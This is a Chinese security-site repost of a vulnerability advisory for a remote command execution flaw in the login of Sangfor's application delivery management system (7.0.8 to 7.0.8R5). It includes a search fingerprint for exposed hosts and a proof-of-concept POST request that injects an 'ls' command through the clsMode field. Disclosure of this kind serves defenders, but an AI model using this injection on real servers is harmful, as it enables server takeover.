深信服 应用交付管理系统 login 存在远程命令执行漏洞

admin
admin
admin
103521
文章
87
评论
2023年8月10日01:27:58评论634 views字数 356阅读1分11秒阅读模式

免责声明

本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。

漏洞描述

深信服 应用交付管理系统 login 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令

漏洞影响

深信服 应用交付管理系统 7.0.8-7.0.8R5

网络测绘

fid="iaytNA57019/kADk8Nev7g=="

漏洞复现

登陆页面

深信服 应用交付管理系统 login 存在远程命令执行漏洞

验证POC

POST /rep/login 
clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123

深信服 应用交付管理系统 login 存在远程命令执行漏洞

原文始发于微信公众号(浪飒sec):深信服 应用交付管理系统 login 存在远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月10日01:27:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   深信服 应用交付管理系统 login 存在远程命令执行漏洞https://cn-sec.com/archives/1945360.html

发表评论

匿名网友 填写信息